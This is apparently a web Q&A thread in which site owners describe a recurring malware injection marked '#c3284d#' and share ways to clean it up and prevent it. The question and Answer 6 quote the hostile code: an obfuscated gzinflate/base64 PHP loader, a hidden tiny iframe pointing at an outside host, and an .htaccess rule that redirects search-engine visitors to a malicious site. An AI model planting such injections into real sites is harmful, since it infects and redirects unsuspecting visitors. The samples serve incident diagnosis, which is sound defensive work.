Website iframe attack - inserts code into source

Question

Over the last few days, my website has repeatedly been the target of an iframe attack. The code is appended mainly to PHP and Javascript pages. The code is then PHP base 64 encoded, see example (I've changed the code slightly to neutralise it):

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

This decoded looks something like this:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

The one thing in common is that all the code has the comment "#c3284d#" so tracking down the malicious code is not difficult. But it is time consuming...

We're on a shared server at Gradwell (UK) and they have not been particularly helpful. So the question is what can I do to stop this issue from repeating itself? I am aware of MySQL Injection attacks and use PHP's mysql_real_escape_string to guard against such attacks.

The site is PHP and MySQL drive. We use MySQLFTP and have a shell account for SSH access. We use Wordpress (latest update with plugins de-activated).

Answer 1

bad guys have access to your code, so you have to close their access, in the meantime you can use a simple script that check and delete all lines where it detect gzinflate(base64_decode, but even the best code(checksum checker with backup files) will be useless if they still have access

Answer 2

I recommend that you take a look at this:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
It also has a script to clean it up.

Answer 3

I had the same problem and found that the method they used to get in was a hacked ftp password.

Even though this is running on a cPanel server with CPHulk brute force protection enabled, I found that the hackers attempted to brute force their way in via thousands of different compromised hosts.

Fortunately I had a log of all the files that were uploaded so I wrote a script to restore these files from backups.

I then increased the cPanel brute force protection levels by reducing the number of failed attempts required before the account is locked.

Answer 4

Had the same problem on all Wordpress sites that i administrated. Didnt find the source of infection, i bet that its some worm on my computer or it`s some Plugin that i installed on all sites.

I found all files that were modified in WP-Better security plugin logs and deleted additional infected code and after i made chmod 444 on all files that were source of infection.

Now im free since 1 month of evil iframes/htacess and other stuff.

Answer 5

I had the same problem but into a Wordpress site.

I guess the site was infected through the widgets, because I use one plugin wich allows PHP code to be executed.

My best solution was:

• eliminate the suspicious widget;
• see the time and date of one infected file(my case: header.php);
• clear all infected files(in my case I have a backup of the site);
• search into log file for suspicious IPs at that time (search finded IPs on blacklists);
• install one plugin to ban suspicious IPs.

From that moment the problem was gone. I hope this will help you.

Answer 6

I also have the same problem. In my case the appended code is

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

In addition, there is a .htaccess file as below:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#

I found two articles about this issue: http://www.webmasterworld.com/html/4472821.htm and http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hope it helps

Answer 7

I have the same problem and variants of different hacked files on many differnt domains. The one common thing I notice is Wordpress. We have wordpress on many of these servers and I think that is the common culprit. I've updated all my wordpress accounts, changed all pwords for all domain accounts. not sure if problem is totally resolved yet.

Answer 8

I had the same issue. The FTP server's access logs showed that the modifications were made using a hacked FTP password.